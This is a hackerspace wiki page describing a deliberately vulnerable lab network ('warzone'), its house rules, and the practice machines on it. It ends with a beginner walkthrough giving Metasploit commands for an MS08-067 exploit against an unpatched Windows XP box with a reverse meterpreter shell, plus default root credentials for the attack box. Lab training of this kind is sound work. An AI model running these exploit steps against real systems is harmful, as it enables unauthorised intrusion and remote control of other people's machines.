From Interlock Rochester Wiki
The warzone is a playground for security hackers. When joining this network you should assume that you will be attacked by other people on the network or the network itself. For those interested, there are systems set up that are designed to be exploited in different ways.
Feel free to poke around the network, setup your own boxes and services, make a honeypot, pop a box, or just watch the traffic.
- DOS is for newbs: Denial of service attacks are always possible with this setup. Intentional simple denial of service attacks (like ARP poisoning to nowhere or crashing switches) will be met with frowny faces and "pfffs" from your fellow members.
- You break it, you bought it: If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up. If all else fails, talk to antitree.
- Take off your whitehat: Please don't break in and fix a hole for someone else. The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.
How to join
- join the wireless network with the ESSID "warzone" "AAAAAAAAAA I don't know the password!" You'll figure it out
- connect your system into any of the bottom two network jacks around the space
On the network
Damn Vulnerable Linux 00:0C:29:A6:83:1D
Designed to be a fully functioning Linux server with misconfigured/exploitable services. Can you find which ones?
De-ICE 100 00:0C:29:C0:6A:A4
De-ICE 100 is the first of a set of incrementally challenging vulnerable LiveCD's. 100 starts you out with the same kind of services as DVL. Check out their website for the storyline that goes along with it.
De-ICE 110 00:0C:29:C8:8E:3A
De-ICE 110 is the second level of the vulnerable de-ice series of vulnerable LiveCD's. Check the website for the story line that goes along with this server.
Windows XP SP2 00:0C:29:B1:0F:1C
This is a standard windows XP image based on the images from the FDCC project. It was originally designed from the Metasploit Unleashed training servers. There is nothing particularly special about this but it is an unpatched system running some extra services. Some of us have already started to make a tagging board for fun.
Damn Vulnerable Web App 00:0C:29:C8:8E:3A
Created by OWASP, DVWA attempts to be a simple web service that was horribly designed. XSS, SQLi, Remote file inclusion are just a few of the problems.
BadStore 123 00:14:22:0b:4a:3e
Not designed to be hacked but for setting up or providing test services.
Vmware ESX provides most of the systems that are available on the network
This is not a designed to be vulnerable distribution but rather a VOIP system for testing vulnerabilities in this type of server.
Backtrack 4 Final
Not designed to be a vulnerable system but it does have all the tools you'll need to exploit the rest of the network. Log in with SSH and use it to pivot through the rest of the network. Username is root and password is toor. All settings are persistent between reboots.
Your first Metasploit Reverse Shell
Steps to hack your first system:
- ssh into the backtrack box (usually 192.168.1.202)
- username root password toor
- run a ping sweep of the network
nmap -sP 192.168.1.0/24
- review the IPs and find where the windows XP box is hiding
- start metasploit
- at the console use the MS08_067 Netapi exploit
msf > use exploit/windows/smb/ms08_067_netapi
- type show options to see what values are needed
- set the remote host to the IP address you found above
msf > set RHOST 192.168.1.200
- change the default port from 445 to 139
msf > set RPORT 139
- set the payload to the reverse meterpreter shell
msf > set PAYLOAD windows/meterpreter/reverse_tcp
- set the local host of backtrack's IP so the shell knows where to connect back to
msf > set LHOST 192.168.1.202
msf > exploit
If you have everything correct, you should get a meterpreter prompt. Now what can you do??....
- add an onion topology - make multiple layers of the network and have some boxes bridge between the other networks. Attackers have to break into one system to get to the next network.
- Setup standard backups using a virtual appliance
- Add more systems from this resource: http://sourceforge.net/projects/virtualhacking/files/